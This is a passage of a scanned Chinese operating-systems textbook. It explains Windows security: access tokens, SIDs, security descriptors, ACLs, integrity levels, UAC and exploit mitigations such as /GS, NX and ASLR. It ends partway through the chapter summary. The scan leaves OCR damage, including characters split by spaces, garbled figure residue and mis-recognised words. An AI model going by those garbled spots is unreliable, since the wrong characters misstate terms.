1) 具有 反 欺 骗 措 施 的 安全 登录 。 

2) 自主 访问 控制 。 

3) 特权 化 访问 控制 。 

4) 对 每 个 进程 的 地 址 空间 保护 。 

5) 新 页 被 映射 前 必需 清空 。 

6) 安全 审计 。 

让 我 们 来 简要 地 回顾 一 下 这 些 条 目 。 

安全 登录 意味 着 系统 管理 员 可 以 要 求 所 有 用 户 必 须 拥 有 密码 才 可 以 登录 。 欺 骗 是 指 一 个 恶意 用 户 编 
写 了 一 个 在 屏幕 上 显示 登录 提示 的 程序 然后 走 开 以 期 望 一 个 无 境 的 用 户 会 坐 下 来 并 输入 用 户 名 和 密码。 
用 户 名 和 密码 被 写 到 磁盘 中 并 且 用 户 被 告知 登陆 失败 。Windows 通 过 指示 用 户 按 下 CTRL-ALT-DEL 登 录 
来 避免 这 样 的 攻击 。 键 盘 驱 动 总 是 可 以 捕获 这 个 键 序 列 ， 并 随后 调用 一 个 系统 程序 来 显示 真正 的 登录 屏 
幕 。 这 个 过 程 可 以 起 作用 是 因为 用 户 进程 无 法 禁止 键盘 驱动 对 CTRL-ALT-DEL 的 处 理 。 但 是 NT 可 以 并 
且 确 实在 某 些 情况 下 禁用 了 CTRL-ALT-DEL 安 全 警告 序列 ， 特 别 是 对 于 消费 者 以 及 启用 默认 禁用 访问 权 
限 的 系统 ， 如 很 少 包含 物理 键盘 的 手机 、 平 板 电脑 和 Xbox 。 

自主 访问 控制 允许 文件 或 者 其 他 对 象 的 所 有 者 指定 谁 能 以 何 种 方式 使 用 它 。 特 权 化 访问 控制 允许 系 
统管 理 员 (超级 用 户 ) 随 需 覆盖 上 述 权限 设 定 。 地 址 空间 保护 仅仅 意味 着 每 个 进程 自己 的 受 保护 的 虚拟 
地 址 空间 不 能 被 其 他 未 授权 的 进程 访问 。 下 一 个 条 目 意味 着 当 进 程 的 堆 增长 时 被 映射 进来 的 页 面 被 初始 
化 为 零 ， 这 样 它 就 找 不 到 页 面 以 前 的 所 有 者 所 存放 的 旧 信 息 (参见 在 图 11-34 中 为 此 目的 而 提供 的 清 零 
页 的 列表 )。 最 后 ， 安 全 审计 使 得 管理 员 可 以 获取 某 些 安全 相关 事件 的 日 志 。 

橘 皮 书 没有 指定 当 笔记 本 电脑 被 盗 时 将 发 生 什么 事情 ， 然 而 在 一 个 大 型 组 织 中 每 星期 发 生 一 起 盗窃 
是 很 常见 的 。 于 是 ，Windows 提 供 了 一 些 工 具 ， 当 笔记 本 被 盗 或 者 丢失 时 ， 谨 慎 的 用 户 可 以 利用 它们 最 
小 化 损失 。 当 然 ， 谨 慎 的 用 户 正 是 那些 不 会 丢失 笔记 本 的 人 一 一 这 种 麻烦 是 其 他 人 引起 的 。 

下 一 章 将 描述 在 Windows 中 基本 的 安全 概念 ， 以 及 关于 安全 的 系统 调用 。 最 后 ,我 们 将 看 看 安全 是 
怎样 实现 的 。 
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11.10.1 基本 概念 

每 个 Windows 用 户 (和 组 ) 用 一 个 SID (Security ID ， 安 全 ID) 来 标识 。SID 是 二 进 制 数字 ， 由 一 个 
短 的 头 部 后 面 接 一 个 长 的 随机 部 分 构成 。 每 个 SID 都 是 世界 范围 内 唯一 的 。 当 用 户 启动 进程 时 ， 进 程 和 
它 的 线程 带 有 该 用 户 的 SID 运 行 。 安 全 系统 中 的 大 部 分 地 方 被 设计 为 确保 只 有 带 有 授权 SID 的 线程 才 可 
以 访问 对 象 。 

每 个 进程 拥有 一 个 指定 了 SID 和 其 他 属性 的 访问 令 牌 。 该 令 牌 通常 由 winlogon 创 建 ， 就 像 后 面 说 的 
那样 。 图 11-45 展 示 了 令 牌 的 格式 。 进 程 可 以 调用 GetTokenlnformation 来 获取 令 牌 信息 。 令 牌 的 头 部 包 
含 了 一 些 管 理性 的 信息 。 过 期 时 间 字 段 表示 令 牌 何 时 不 再 有 效 ， 但 当前 并 没有 使 用 该 字段 。 组 字段 指定 
了 进程 所 隶属 的 组 。POSIX 子 系统 需要 该 字段 。 默 认 的 DACL (Discretionary Access Control List， 自 主 
访问 控制 列表 ) 会 赋 给 被 进程 创建 的 对 象 ， 如 果 没 有 指定 其 他 ACL 的 话 。 用 户 的 SID 表 示 进 程 的 拥有 者 。 
受 限 SID 使 得 不 可 信 的 进程 以 较 少 的 权限 参与 到 可 信 进 程 的 工作 中 ， 以 免 造 成 破坏 。 

最 后 ， 权 限 字 段 ， 如 果 有 的 话 ， 赋 了 予 进 程 除 普 通用 户外 特殊 的 权利 ， 比 如 关机 和 访问 本 来 无 权 访问 
的 文件 的 权利 。 实 际 上 ， 权 限 域 将 超级 用 户 的 权限 分 成 几 种 可 独立 赋予 进程 的 权限 。 这 样 ， 用 户 可 被 赋 
予 一 些 超级 用 户 的 权限 ， 但 不 是 全 部 的 权限 。 总 之 ， 访 问 令 牌 表示 了 谁 拥有 这 个 进程 和 与 其 关联 的 权限 
及 默认 值 。 


Cen [mm [a [anonc mso [aso [anso [an | ronnan | zeran 
图 11-45 访问 令 牌 结构 


当 用 户 登录 时 ， winlogon 赋 予 初始 的 进程 一 个 访问 令 牌 。 后 续 的 进程 一 般 会 将 这 个 令 牌 继承 下 去 。 
初始 时 ， 进 程 的 访问 令 牌 会 被 赋予 其 所 有 的 线程 。 然 而 ， 线 程 在 运行 过 程 中 可 以 获得 一 个 不 同 的 令 牌 ， 
在 这 种 情况 下 ， 线 程 的 访问 令 牌 覆盖 了 进程 的 访问 令 牌 。 特 别 地 ， 一 个 客户 端 线程 可 以 将 访问 权限 传递 
给 服务 器 线程 ， 从 而 使 得 服务 器 可 以 访问 客户 端的 受 保护 的 文件 和 其 他 对 象 。 这 种 机 制 叫 作 身份 模拟 
(impersonation) 。 它 是 由 传输 层 (比如 ALPC、 命 名 管道 和 TCP/IP) 实现 的 、 被 RPC 用 来 实现 从 客户 端 
到 服务 器 的 通信 。 传 输 层 使 用 内 核 中 安全 引用 监控 器 组 件 的 内 部 接口 提取 出 当前 线程 访问 令 牌 的 安全 上 
下 文 ， 并 把 它 传送 到 服务 器 端 来 构建 用 于 服务 器 模拟 客户 身份 的 令 牌 。 

另 一 个 基本 的 概念 是 安全 描述 符 (security descriptor) 。 每 个 对 象 都 关联 着 一 个 安全 描述 符 ， 该 描 
述 符 描述 了 谁 可 以 对 对 象 执行 何 种 操作 。 安 全 描述 符 在 对 象 被 创建 的 时 候 指定 。NTFS 文 件 系 统 和 注册 
表 维护 着 安全 描述 符 的 持久 化 形式 ， 用 以 为 文件 和 键 对 象 (对象 管理 器 中 表示 已 打开 的 文件 和 键 的 实例 ) 
创建 安全 描述 符 。 

安全 描述 由 一 个 头 部 和 其 后 带 有 一 个 或 多 个 访问 控制 入 口 (Access Control Entry, ACE) 的 DACL 组 
成 。ACE 主 要 有 两 类 : 允许 项 和 拒绝 项 。 人 允许 项 含有 一 个 SID 和 一 个 表示 带 有 此 SID 的 进程 可 以 执行 哪些 
操作 的 位 图 。 拒 绝 项 与 允许 项 相同 ， 不 过 其 位 图 表示 的 是 谁 不 可 以 执行 那些 操作 。 比 如 ，Ida 拥 有 一 个 文 
件 ， 其 安全 描述 符 指定 任何 人 都 可 读 ，Elvis 不 可 访问 ，Cathy 可 读 可 写 ， 并 且 Ida 自 己 拥有 完全 的 访问 权 
限 。 图 11-46 描 述 了 这 个 简单 的 例子 。Everyone 这 个 SID 表 示 所 有 的 用 户 ， 但 该 表 项 会 被 任何 显 式 的 ACE 
Až. 

除 DACL 外 ， 安 全 描述 符 还 包含 一 个 系统 访问 控制 列表 (System Access Control List, SACL), 
SACL 跟 DACL 很 相似 ， 不 过 它 表 示 的 并 不 是 谁 可 以 使 用 对 象 ， 而 是 哪些 对 象 访问 操作 会 被 记录 在 系统 
范围 内 的 安全 事件 日 志 中 。 在 图 11-46 中 ，Marilyn 对 文件 执行 的 任何 操作 都 将 会 被 记录 。SACL 还 包含 完 
整 度 级 别 字 段 ， 我 们 将 稍 后 讨论 它 。 


11.10.2 安全 相关 的 API 调 用 

Windows 的 访问 控制 机 制 大 都 基于 安全 描述 符 。 通 常情 况 下 进程 创建 对 象 时 会 将 一 个 安全 描述 符 作 
为 参数 提供 给 CreateProcess、CreateFile 或 者 其 他 对 象 创建 调用 。 该 安全 描述 符 就 会 附属 在 这 个 对 象 
上 ， 就 如 在 图 11-46 中 看 到 的 那样 。 如 果 没 有 给 创建 对 象 的 函数 调用 提供 安全 描述 符 ， 调 用 者 的 访问 令 
牌 中 默认 的 安全 设置 (参见 图 11-45) 将 被 使 用 。 
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图 11-46 文件 的 安全 描述 符 示 例 


大 部 分 Win32 API 安 全 调用 跟 安全 描述 符 的 管理 相关 ， 因 此 在 这 里 主要 关注 它们 。 图 11-47 列 出 了 那 
些 最 重要 的 调用 。 为 了 创建 安全 描述 符 ， 首 先 要 分 配 存储 空间 ， 然 后 调用 Initialize Security Descriptor 
初始 化 它 。 该 调用 填充 了 安全 描述 符 的 头 部 。 如 果 不 知 道 所 有 者 的 SID ， 可 以 根据 名 字 用 
LookupAccountSid 来 查询 。 随 后 SID 被 插入 到 安全 描述 符 中 。 对 组 SID 也 一 样 ， 如 果 有 的 话 。 通 常 ， 这 
些 SID 会 是 调用 者 自己 的 SID 和 它 的 某 一 个 组 SID， 不 过 系统 管理 员 可 以 填充 任何 SID 。 
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图 11-47 Win32 中 基本 的 安全 调用 


这 时 可 调用 InitializeAcl 初 始 化 安全 描述 符 的 DACL (或 者 SACL)。ACL 入 口 项 可 通过 AddAccess 
AllowedAce 和 AddAccessDeniedAce。 可 多 次 调用 这 些 函 数 以 添加 任何 所 需 的 ACE 人 口 项 。 可 调用 
DeleteAce 来 删除 一 个 入 口 项 ， 这 用 来 修改 已 存在 的 ACL 而 不 是 构建 一 个 新 的 ACL。SetSecurity 
DescriptorDacl 可 以 把 一 个 准备 就 绪 的 ACL 与 安全 描述 符 关联 到 一 起 。 最 后 ， 当 创建 对 象 时 ， 可 将 新 构 
造 的 安全 描述 符 作为 参数 传送 使 其 与 这 个 对 象 相关 联 。 


11.10.3 安全 实现 

在 独立 的 Windows 系 统 中 ， 安 全 是 由 大 量 的 组 件 来 实现 的 ， 我 们 已 经 看 过 了 其 中 大 部 分 组 件 (网 络 
是 完全 不 同 的 事情 ， 超 出 了 本 书 的 讨论 范围 )。 登 录 和 认证 分 别 由 winlogon 和 1]sass 来 处 理 。 登 录 成 功 后 会 
获得 一 个 带 有 访问 令 牌 的 GUI shell 程 序 (explorer.exe), 这 个 进程 使 用 注册 表 中 的 SECURITY 和 SAM 表 
项 。 前 者 设置 一 般 性 的 安全 策略 ， 而 后 者 包含 了 针对 个 别 用 户 的 安全 信息 ， 如 11.2.3 节 讨论 的 那样 。 
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一 旦 用 户 登 录 成 功 ， 每 当 打 开 对 象 进行 访问 就 会 触发 安全 操作 。 每 次 OpenXXX 调 用 都 需 提供 正 要 
被 打开 的 对 象 的 名 字 和 所 需 的 权限 集合 。 在 打开 的 过 程 中 ， 安 全 引用 监控 器 会 检查 调用 者 是 否 拥有 所 需 
的 权限 。 它 通过 检查 调用 者 的 访问 令 牌 和 跟 对 象 关 联 的 DACL 来 执行 这 种 检查 。 安 全 监控 管理 器 依次 检 
查 ACL 中 的 每 个 ACE。 一 旦 发 现 入 口 项 与 调用 者 的 SID 或 者 调用 者 所 隶属 的 某 个 组 相 匹 配 ， 访 问 权限 即 
可 确定 。 如 果 调 用 者 拥有 所 需 的 权限 ， 则 打开 成 功 ， 否 则 打开 失败 。 

正如 已 经 看 到 的 那样 ， 除 允许 项 外 ，DACL 还 包括 拒绝 项 。 因 此 ， 通 常 把 ACL 中 的 拒绝 访问 的 项 置 
于 赋予 访问 权限 的 项 之 前 ， 这 样 一 个 被 特意 拒绝 访问 的 用 户 不 能 通过 作为 拥有 合法 访问 权限 的 组 的 成 员 
这 样 的 后 门 获 得 访问 权 。 

对 象 被 打开 后 ， 调 用 者 会 获得 一 个 句柄 。 在 后 续 的 调用 中 ， 只 需 检 查 尝 试 的 操作 是 否 在 打开 时 所 申 
请 的 操作 集合 内 ， 这 样 就 避免 了 调用 者 为 了 读 而 打开 文件 然后 对 该 文件 进行 写 操作 。 另 外 ， 正 如 SACL 
所 要 求 的 那样 ， 在 句柄 上 进行 的 调用 可 能 会 导致 产生 审计 日 志 。 

Windows 增 加 了 另外 的 安全 设施 来 应 对 使 用 ACL 保 护 系统 的 常见 问题 。 进 程 的 令 牌 中 含有 新 增加 的 
必需 的 完整 性 级 别 (Integrity-Level) SID 字 段 并 且 对 象 在 SACL 中 指定 了 一 个 完整 性 级 别 ACE。 完 整 性 
级 别 阻 止 了 对 对 象 的 写 访 问 ， 不 管 DACL 中 有 何 种 ACE。 特 别 地 ， 完 整 性 级 别 方案 用 来 保护 系统 免 受 被 
攻击 者 控制 的 Internet Explorer 进 程 ( 可 能 用 户 接 受 了 不 妥 的 建议 而 从 未 知 的 网 站 下 载 代码 ) 的 破坏 。 低 
权限 的 IE 运 行 时 的 完整 性 级 别 被 设置 为 低 。 系 统 中 所 有 的 文件 和 注册 表 中 的 键 拥 有 中 级 的 完整 性 级 别 ， 
因此 低 完 整 性 级 别 的 IE 不 能 修改 它们 。 

近年 来 Windows 增 加 了 很 多 其 他 的 安全 特性 。 在 Windows XP Service Pack 2 中 ， 系 统 的 大 部 分 组 件 
在 编译 时 使 用 了 可 对 多 种 栈 缓冲 区 溢出 漏洞 进行 验证 的 选项 (/GS) 。 另 外 ， 在 AMD64 体 系 结构 中 一 种 
叫 作 NX 的 功能 可 限制 执行 栈 上 的 代码 。 即 使 运行 在 x86 模 式 下 处 理 器 中 的 NX 位 也 是 可 用 的 。NX 代 表 不 
可 执行 (no execute) ， 它 可 以 给 页 面 加 上 标记 使 得 其 上 的 代码 不 能 被 执行 。 这 样 ， 即 使 攻击 者 利用 缓冲 
区 溢出 漏洞 向 进程 插入 代码 ， 跳 转 到 代码 处 开始 执行 也 不 是 一 件 容易 的 事情 。 

Windows 引 入 了 更 多 的 安全 特性 来 阻止 攻击 者 。 加 载 到 内 核 态 的 代码 要 经 过 检查 (这 在 x64 系 统 中 
是 默认 的 ) 并 且 只 有 被 一 个 有 名 且 信 得 过 的 机 构 正 确 签名 的 代码 才 可 以 被 加 载 。 在 每 个 系统 中 ，DLL 和 
EXE 的 加 载 地 址 连同 栈 分 配 的 地 址 都 经 过 了 有 意 的 混 排 ,这 使 得 攻击 者 不 太 可 能 利用 缓冲 区 溢出 漏洞 跳 
转 到 一 个 众所周知 的 地 址 然后 执行 一 段 被 特意 编排 的 可 获得 权限 提升 的 代码 。 会 有 更 小 比例 的 系统 受到 
依赖 于 标准 地 址 处 的 二 进 制 数 据 的 攻击 。 在 受到 攻击 时 系统 更 加 可 能 只 是 崩溃 掉 ， 将 一 个 潜在 的 权限 升 
级 攻击 转化 为 危险 性 更 小 的 拒绝 服务 攻击 。 

微软 公司 的 另 一 个 改变 是 引入 用 户 账 户 控制 (User Account Control, UAC) 的 引入 是 另 一 个 改变 。 
这 用 来 解决 大 部 分 用 户 以 管理 员 身份 运行 系统 这 个 长 期 的 问题 。Windows 的 设计 并 不 需要 用 户 以 管理 员 身 
份 使 用 系统 ， 但 在 很 多 发 布 版 本 中 对 此 问题 的 忽视 使 得 如 果 你 不 是 管理 员 就 不 可 能 顺利 地 使 用 Windows。 
始终 以 管理 员 身 份 使 用 系统 是 危险 的 。 用 户 的 错误 会 轻易 地 毁坏 系统 ， 而 且 如 果 用 户 由 于 某 种 原因 被 其 
骗 或 攻击 了 而 去 运行 可 能 危害 系统 的 代码 ， 这 些 代 码 将 拥有 管理 员 的 访问 权限 并 且 可 能 会 把 其 自身 深 深 
埋藏 在 系统 中 。 

如 果 有 UAC， 当 尝试 执行 需要 管理 员 访 问 权 限 的 操作 时 ， 系 统 会 显示 一 个 登 加 的 特殊 桌面 并 且 接 管 
控制 权 ， 使 得 只 有 用 户 的 输入 可 以 授权 这 次 访问 (与 C2 安全 中 CTRL-ALT-DEL 的 工作 方式 类 似 )。 当 然 ， 
攻击 者 不 需要 成 为 管理 员 也 可 以 破坏 用 户 所 真正 关心 的 ， 比 如 他 的 个 人 文件 。 但 UAC 确 实 可 阻止 现 有 类 
型 的 攻击 ， 并 且 如 果 攻 击 者 不 能 修改 任何 系统 数据 或 文件 ， 那 受 损 的 系统 恢复 起 来 也 比较 容易 。 

Windows 中 最 后 的 一 个 安全 特性 已 经 提 到 过 了 。 这 就 是 对 具有 安全 边界 的 受 保 护 进程 (protected 
process) 的 支持 。 通 常 ， 在 系统 中 用 户 (由 令 牌 对 象 代 表 ) 定义 了 权限 的 边界 。 创 建 进程 后 ， 用 户 可 通 
过 任意 数目 的 内 核 设施 来 访问 进程 以 进行 进程 创建 、 调 试 、 获 取 路 径 名 和 线程 注入 等 。 受 保护 进程 关 掉 
了 用 户 的 访问 权限 。 这 个 设施 的 初衷 就 是 在 Windows 中 人 允许 数字 版 权 管理 软件 更 好 地 保护 内 容 。 在 
Windows 8.1 中 ， 对 受 保护 进程 的 使 用 会 用 于 对 用 户 更 加 友好 的 目的 ， 比 方 说 保护 系统 以 应 对 攻击 者 而 
不 是 保护 内 容 免 受 系统 所 有 者 的 攻击 。 

由 于 世界 范围 内 越 来 越 多 的 针对 Windows 系 统 的 攻击 ， 近 年 来 微软 公司 加 大 了 提高 Windows 安 全 性 
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的 努力 。 其 中 某 些 攻击 非常 成 功 ， 使 得 整个 国家 和 主要 公司 的 计算 机 都 宕 掉 了 ， 导 致 了 数 十 亿美 元 的 损 
失 。 这 些 攻 击 大 都 利用 了 代码 中 的 小 错误 ， 这 些 错误 可 导致 缓冲 区 溢出 ， 或 者 在 其 释放 之 后 仍然 占用 内 
存 ， 从 而 使 得 攻击 者 可 以 通过 重 写 返 回 地 址 、 异 常 处 理 指针 、 虚 拟 函 数 指针 和 其 他 数据 来 控制 程序 的 执 
行 。 使 用 类 型 安全 的 语言 而 不 是 C 和 C++ 可 避免 许多 此 类 的 问题 。 即 使 使 用 这 些 不 安全 的 语言 ， 如 果 让 
学 生 更 好 地 理解 参数 和 数据 验证 中 的 陷阱 ， 许 多 漏洞 也 可 以 避免 。 毕 竟 ， 许 多 在 微软 编写 代码 的 软件 工 
程 师 在 几 年 前 也 还 是 学 生 ， 就 像 正 在 阅读 此 实例 研究 的 你 们 中 的 许多 人 一 样 。 有 许多 关于 在 基于 指针 的 
语言 中 可 被 利用 的 代码 上 的 小 错误 的 类 型 以 及 怎样 避免 的 书籍 (比如 ，Howard 和 LeBlank，2009) 。 


11.10.4 安全 缓解 技术 

对 于 用 户 来 说 ， 如 果 计 算 机 软件 没有 任何 漏洞 ， 那 将 是 非常 棒 的 。 尤 其 是 那些 可 以 被 黑客 利用 的 漏 
洞 ， 通过 这 些 漏 洞 ， 黑客 可 以 控制 用 户 的 电脑 并 窗 取 他 们 的 信息 ,或 者 使 用 他 们 的 计算 机 用 于 非法 目的 ， 
如 拒绝 服务 的 分 布 式 攻 击 、 影 响 其 他 计算 机 、 垃 圾 邮件 或 其 他 非法 内 容 的 散布 。 很 不 幸 ， 在 实际 中 不 可 
能 做 到 没有 漏洞 ， 计 算 机 中 一 直 会 有 安全 漏洞 。 操 作 系 统 开发 人 员 已 经 花费 了 巨大 的 努力 来 减少 错误 的 
数量 ， 并 获得 了 可 观 的 成 功 ， 以 致 攻击 者 正在 将 他 们 的 关注 焦点 转移 到 应 用 软件 或 浏览 器 插件 (如 
Adobe Flash) 上 ， 而 不 再 关注 操作 系统 本 身 。 

计算 机 系统 仍 可 以 通过 缓解 (mitigation) 技术 以 使 得 漏洞 更 难 被 发 现 ， 从 而 使 系统 变 得 更 安全 。 
Windows 十 年 来 在 不 断 改进 缓解 技术 ， 目 前 已 经 更 新 至 Windows 8.1 中 。 

图 11-48 列 出 的 各 个 缓解 技术 用 到 了 不 同 的 步骤 ， 它 们 都 需要 有 效 地 利用 Windows 系 统 。 有 些 技术 
提供 纵深 防御 ， 可 以 与 其 他 缓解 技术 协同 使 用 。/ GS 用 于 防止 堆栈 溢出 攻击 ， 在 这 种 攻击 中 ， 攻 击 者 可 
能 修改 返回 地 址 、 函 数 指针 和 异常 处 理 程序 。 异 常 处 理 增加 了 额外 的 检查 ， 以 验证 异常 处 理 程序 的 地 址 
链 不 会 被 覆盖 。 不 执行 (NX) 保护 要 求 成 功 的 攻击 者 不 仅 要 将 程序 计数 器 指向 数据 有 效 载荷 ， 还 要 指 
向 系统 已 经 标记 为 可 执行 的 代码 。 当 攻击 者 试图 规避 不 执行 保护 时 ， 通 常会 采用 返回 导向 编程 技术 或 返 
回 libC 编 程 技术 ， 从 而 将 程序 计数 器 指向 可 以 发 动 攻击 的 代码 片段 。 地 址 空间 布局 随机 化 (Address 
Space Layout Randomization, ASLR) 阻止 攻击 的 方式 是 ， 使 攻击 者 难以 提前 知道 代码 、 堆 栈 和 其 他 数 
据 结 构 在 地 址 空间 中 的 确切 加 载 位 置 。 最 近 的 研究 表明 ， 可 以 每 隔 几 秒 钟 就 对 运行 程序 进行 一 次 随机 化 ， 
以 使 攻击 变 得 更 加 困难 (Giuffrida 等 人 ，2012) 。 
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图 11-48 Windows 中 一 些 主要 的 安全 缓解 技术 


堆 加 固 是 Windows 堆 实现 中 添加 的 一 系列 缓解 技术 ， 目 的 是 使 漏洞 更 加 难以 暴露 ， 例 如 写 超出 堆 分 
配 的 边界 或 在 释放 之 后 持续 使 用 堆 块 。VTGuard 增 加 了 对 特别 敏感 代码 的 额外 检查 ， 以 防 由 于 C ++ 虚 函 
数 表 的 关系 而 使 释放 后 使 用 的 漏洞 暴露 出 来 。 

代码 完整 性 是 内 核 级 的 保护 ， 用 以 防止 任意 可 执行 代码 被 加 载 到 进程 中 。 它 对 程序 和 库 进行 检查 ， 
以 确保 它们 都 是 由 值得 信任 的 发 布 者 所 加 密 签名 的 。 当 从 磁盘 中 取 回 单 页 时 ， 这 些 检查 与 内 存 管理 器 一 
同 工 作 ， 以 逐 页 验证 代码 。PatchGuard 也 是 内 核 级 的 缓解 技术 ， 它 试图 检测 恶意 rootkit， 这 些 rootkit 会 
将 成 功 的 攻击 隐藏 起 来 以 规避 检测 。 

Windows 更 新 是 一 项 自动 化 的 服务 ， 通 过 修补 Windows 中 受 影响 的 程序 和 库 以 修复 安全 漏洞 。 安 全 


552 . FUE 





研究 人 员 发 现 了 很 多 漏洞 并 进行 了 修复 ， 他 们 的 贡献 记录 在 与 每 项 修复 相关 的 注释 中 。 讽 刺 的 是 ， 安 全 
更 新 本 身 也 带 来 了 莫大 的 风险 。 攻 击 者 利用 的 几乎 所 有 漏洞 ， 都 是 在 微软 公布 修复 不 久之 后 就 被 发 现 的 。 
这 是 因为 对 修复 自身 的 反 向 思考 是 大 多 数 黑 客 发 现 系统 漏洞 的 主要 方式 ， 所 以 那些 没有 及 时 更 新 的 系统 
很 容易 受到 攻击 。 安 全 专家 通常 坚持 认为 公司 应 该 在 合理 的 时 间 内 修复 发 现 的 所 有 漏洞 。 为 了 使 安全 专 
家 满意 ， 同 时 也 能 满足 用 户 维护 系统 安全 的 需求 ， 微 软 选择 了 每 月 发 布 补丁 包 这 样 的 频率 ， 而 这 也 可 以 
说 是 一 种 妥协 。 

其 中 有 一 个 例外 ， 就 是 所 谓 的 零 日 漏洞 。 这 种 漏洞 只 有 在 攻击 被 检测 到 之 后 才 为 人 所 知 ， 而 在 此 之 
前 我 们 根本 不 知道 bug 的 存在 。 幸 运 的 是 ， 零 日 漏洞 很 罕见 ， 而 且 在 上 述 缓解 技术 的 帮助 下 ， 现 有 零 日 
漏洞 也 很 难 再 发 挥 作 用 。 关 于 零 日 漏洞 存在 一 些 非法 的 市 场 交 易 ， 而 随 着 新 版 本 Windows 中 缓解 技术 的 
不 断 加 强 ， 开 发 新 的 漏洞 变 得 越发 困难 ， 因 而 漏洞 的 价格 也 在 一 路 疾 升 。 

最 后 ，Windows 中 的 杀毒 软件 已 成 为 对 抗 恶意 软件 的 关键 工具 ， 它 们 包含 在 Windows 的 基础 版 本 中 ， 
称 为 Windows Defender。 防 病毒 软件 通过 内 核 操作 来 检测 恶意 软件 中 的 文件 ， 并 识别 恶意 软件 所 使 用 
的 具体 实例 (或 一 般 类 别 ) 的 行为 模式 。 这 些 行 为 包括 让 系统 重启 的 操作 、 修 改 注册 表 来 改变 系统 行为 
以 及 加 载 攻击 执行 所 需要 的 进程 和 服务 。 虽 然 Windows Defender 提 供 了 相当 不 错 的 保护 ， 也 能 够 对 抗 党 
见 的 恶意 软件 ， 但 是 很 多 用 户 还 是 更 愿意 购买 第 三 方 防 病毒 软件 。 

这 些 缓解 措施 大 多 处 于 编译 器 和 链接 器 的 信号 控制 之 下 。 如 果 应 用 程序 、 内 核 设备 驱动 程序 或 插件 
库 读 入 内 存 中 的 可 执行 文件 数据 或 包含 /GS 和 ASLR 未 启用 的 代码 ， 那 么 缓解 技术 将 不 可 用 ， 并 且 在 程序 
中 的 任何 漏洞 都 更 容易 被 利用 。 幸 运 的 是 ， 最 近 几 年 来 ， 越 来 越 多 的 软件 开发 人 员 意识 到 了 不 启用 缓解 
技术 的 风险 ， 所 以 这 些 技术 通常 是 启用 的 。 

图 11-48 中 的 最 后 两 项 缓解 技术 处 于 各 自 的 计算 机 系统 用 户 或 管理 员 的 控制 下 。 人 允许 Windows 更 新 
修补 软件 并 确保 系统 上 安装 了 更 新 的 防 病毒 软件 ， 这 是 保护 系统 免 受 攻击 的 最 好 的 技术 。Windows 的 企 
业 用 户 版 包含 了 一 项 安全 功能 ， 使 得 管理 员 更 容易 确保 连接 到 网 络 中 的 系统 已 安装 了 全 部 补丁 和 正确 配 
置 的 杀毒 软件 。 i 


11.11 小 结 


Windows 中 的 内 核 态 由 HAL、NTOS 的 内 核 和 执行 体 层 以 及 大 量 实现 了 从 设备 服务 到 文件 系统 、 从 
网 络 到 图 形 的 设备 驱动 程序 组 成 。HAL 对 其 他 组 件 隐 藏 了 硬件 上 的 某 些 差别 。 内 核 层 管理 CPU 以 支持 多 
线程 和 同步 ， 执 行 体 实现 大 多 数 的 内 核 态 服 务 。 

执行 体 基 于 内 核 态 的 对 象 ， 这 些 对 象 代 表 了 关键 的 执行 体 数据 结构 ， 包 括 进程 、 线 程 、 内 存 区 、 驱 
动 程序 、 设 备 以 及 同步 对 象 等 。 用 户 进程 通过 调用 系统 服务 来 创建 对 象 并 获得 句柄 的 引用 以 用 于 后 续 对 
执行 体 组 件 的 调用 。 操 作 系统 也 创建 一 些 内 部 对 象 。 对 象 管理 器 维护 着 一 个 名 字 空 间 ， 对 象 可 以 插入 该 
名 字 空 间 以 备 后 续 的 查询 。 

Windows 系 统 中 最 重要 的 对 象 是 进程 、 线 程 和 内 存 区 。 进 程 拥 有 虚拟 地 址 空间 并 且 是 资源 的 容器 。 
线程 是 执行 的 单元 并 被 内 核 层 使 用 优先 级 算法 调度 执行 ， 该 优先 级 算法 使 优先 级 最 高 的 就 绪 线程 总 在 运 
行 , 并且 如 有 必要 可 抢占 低 优先 级 线程 。 内 存 区 表示 可 以 映射 到 进程 地 址 空间 的 像 文件 这 样 的 内 存 对 象 。 
EXE 和 DLL 等 程序 映像 用 内 存 区 来 表示 ， 就 像 共 享 内 存 一 样 。 

Windows 支 持 按 需 分 页 虚拟 内 存 。 分 页 算法 基于 工作 集 的 概念 。 系 统 维护 着 几 种 类 型 的 页 面 列表 来 
优化 内 存 的 使 用 。 这 些 页 面 列 表 是 通过 调整 工作 集 来 填充 的 ， 调 整 过 程 使 用 了 复杂 的 规则 试图 重用 在 长 
时 间 内 没有 被 引用 的 物理 页 面 。 高 速 缓存 管理 器 管理 内 核 中 的 虚拟 地 址 并 用 它 将 文件 映射 到 内 存 ， 这 提 
高 了 许多 应 用 程序 的 IO 性 能 ， 因 为 读 操作 不 用 访问 磁盘 就 可 被 满足 。 

设备 驱动 程序 遵循 Windows 驱 动 程序 模型 ， 并 执行 1O。 每 个 驱动 程序 开始 先 初始 化 一 个 驱动 程序 对 
象 ， 该 对 象 含 有 可 被 系统 调用 以 操控 设备 的 过 程 的 地 址 。 实 际 的 设备 用 设备 对 象 来 代表 ， 设 备 对 象 可 以 
根据 系统 的 配置 描述 来 创建 ， 或 者 由 即 插 即 用 管理 器 按照 它 在 枚 举 系统 总 线 时 所 发 现 的 设备 创建 。 设 备 
组 织 成 一 个 栈 ，IO 请 求 包 沿 着 栈 向 下 传递 并 被 每 个 设备 的 驱动 程序 处 理 。IHO 具 有 内 在 的 异步 性 ， 驱 动 程 
序 程序 通常 将 请 求 排队 以 便 后 续 处 理 然后 返回 到 调用 者 。 文 件 系统 卷 作 为 JO 系 统 中 的 设备 实现 。 

NTFS 文 件 系统 基于 一 个 主 文件 表 ， 每 个 文件 或 者 目录 在 表 中 有 一 条 记录 。NTFS 文 件 系统 的 所 有 元 
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数据 本 身 是 NTFS 文 件 的 一 部 分 。 每 个 文件 含有 多 个 属性 ， 这 些 属性 或 存储 在 MFT 记 录 中 或 者 不 在 其 中 
(存储 在 MFT 外 部 的 块 中 )。 除 此 之 外 ，NTFS 还 支持 Unicode、 压 缩 、 日 志和 加 密 等 。 

最 后 ，Windows 拥 有 一 个 基于 访问 控制 列表 和 完整 性 级 别 的 成 熟 的 安全 系统 。 每 个 进程 带 有 一 个 令 
牌 ， 此 令 牌 表示 了 用 户 的 标识 和 进程 所 具有 的 特殊 权限 。 每 个 对 象 有 一 个 与 其 相关 联 的 安全 描述 符 。 安 
全 描述 符 指向 一 个 自主 访问 控制 列表 ， 该 列表 中 包含 允许 或 者 拒绝 个 体 或 者 组 访问 的 访问 控制 人 口 项 ， 
